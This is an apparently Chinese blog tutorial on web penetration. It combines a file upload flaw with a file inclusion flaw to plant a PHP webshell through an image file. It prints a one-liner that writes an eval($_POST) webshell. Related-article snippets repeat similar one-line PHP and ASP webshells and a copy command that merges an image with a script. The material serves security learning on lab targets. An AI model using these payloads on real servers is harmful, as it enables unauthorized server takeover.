图片木马---web渗透学习

最新推荐文章于 2024-02-26 12:00:00 发布
最新推荐文章于 2024-02-26 12:00:00 发布
阅读量1.1k 收藏 6
点赞数
分类专栏: 网络安全 开发安全 文章标签: 图片木马 文件上传漏洞 文件包含漏洞 web渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Packet_Lee/article/details/89038392
版权
本文介绍了如何结合文件包含漏洞与文件上传漏洞,穿透高安全级别的限制。通过在图片中嵌入PHP代码,然后利用文件包含访问,生成可执行的shell文件,从而获取服务器权限。同时讨论了数据包抓包分析以及可能的WAF规避策略,并提出了安全防护建议,如动态检查文件内容以防止恶意代码执行。
摘要由CSDN通过智能技术生成

在《文件上传漏洞—Web渗透学习》一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg、JPG、jpeg、JPEG等文件才允许上传。通过代理服务器等方法无法对其进行渗透。
通过文件包含漏洞的渗透方法和文件上传漏洞的方法结合,可以成功渗透文件上传漏洞中的高安全级别。
原理:
我们在高安全级别中真实的长传一张图片,但在通过图片编辑软件,将php语句添加到该图片中。
php语句如下:

<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[1]);?>')?>

然后通过文件包含来访问该图片,使该语句得到执行,从而生成shell50.php文件,文件内容为:

<?php eval($_POST['1']);?>

上传图片:
在这里插入图片描述通过文件包含访问该图片(显示乱码表示图片上传成功):
在这里插入图片描述访问的实质是通过include函数对执行上传的图片进行执行,从而生成shell50

最低0.47元/天 解锁文章
Analy_Lee
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【WEB攻防】图片木马的利用
weixin_45983744的博客
02-15 1万+
交流Q群:876554035 一,图片木马原理 图片木马文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。 二.工具及环境 DVWA靶场环境 010Editor 中国菜刀 三.具体步骤 1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。 图一 登陆界面 图二 选择安全级别,进入 2.利用01...
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7615
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
渗透之——asp图片木马的制作和使用
热门推荐
冰河的专栏
12-11 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588 主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、&lt;%eval request(“a”)%&gt;存为1.asp(就是一句话木马) 3、copy ...
图片马 php 菜刀,图片马的制作以及菜刀的使用
weixin_30407563的博客
04-14 1195
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析图片马是WEB渗透测试时的必备...
图片木马-渗透测试
h0ers的博客
10-28 2774
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木马,保存为 1.php,代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
m0_73720136的博客
05-07 3500
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell。
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不...整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
渗透入门Mr-robott靶机练习.doc
07-09
渗透测试靶机Mr-Robot实践指南 渗透测试是一种网络安全测试,旨在...本文提供了一个完整的渗透测试流程,从网络扫描到shell反弹、木马上传和提权。通过实践Mr-Robot靶机,初学者可以快速掌握渗透测试的技术和工具。
edjpgcom图片一写入木马小工具
03-17
"edjpgcom图片一写入木马小工具" 是一款用于渗透测试的软件工具,它专门设计来检测和利用Web应用程序中的文件上传漏洞文件包含漏洞。"edjpgcom"可能是该工具的特定命名或者核心技术的标识,暗示了其功能可能与JPEG...
Web渗透面试面试集锦.docx
12-14
Web渗透测试是一个涉及多方面技能和知识的领域,主要目的是评估和增强网络系统的安全性。面试中,面试官可能会考察候选人在网络安全、Web应用漏洞、信息收集、漏洞利用、权限提升等方面的专业能力。以下是对给定内容...
Web-安全渗透全套教程04文件上传漏洞.zip
05-22
本套教程“Web-安全渗透全套教程04文件上传漏洞”深入探讨了这一主题,旨在帮助学习者理解文件上传漏洞的工作原理,以及如何进行有效的防护。 文件上传漏洞通常发生在Web应用程序中,允许用户通过上传功能将任意...
网络安全零基础学习路线-思维导图 v2023
09-28
掌握这些基本技能后,你可以开始学习一些更具体的网络安全领域,例如:入侵测试、渗透测试、漏洞评估和防御、网络安全监控等等。学习这些领域将有助于你更全面地了解网络安全并掌握实践技能。 最后,不要忘记继续...
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
10-16
这份"Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf"文档详细涵盖了多个关键知识点,为求职者准备网络安全面试提供了全面的学习材料。 1. **MSF(Metasploit Framework)与Burp Suite**:这两个是渗透...
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
最新发布
wangluoanquan111的博客
02-26 1243
此关涉及到了二次渲染的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP。此语句就是一个检测,如果上传的文件是php格式就得不到图片的尺寸,就会返回错误,后面的代码就无法执行,文件就没办法成功上传。
web渗透文件上传漏洞
qinshuoyang1的博客
07-19 3926
文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。,复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞。......
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5138
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
单机渗透实战:JIS-CTF-vulnupload | 端口扫描与漏洞挖掘
本次实验旨在通过实践操作提升Web安全技能,重点围绕nmap和dirb等工具的使用,以及单主机渗透测试的基本流程。实验目标是获取目标主机上的五个预置flag,每个flag以32位MD5值命名,需要解决存在的安全问题和漏洞。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值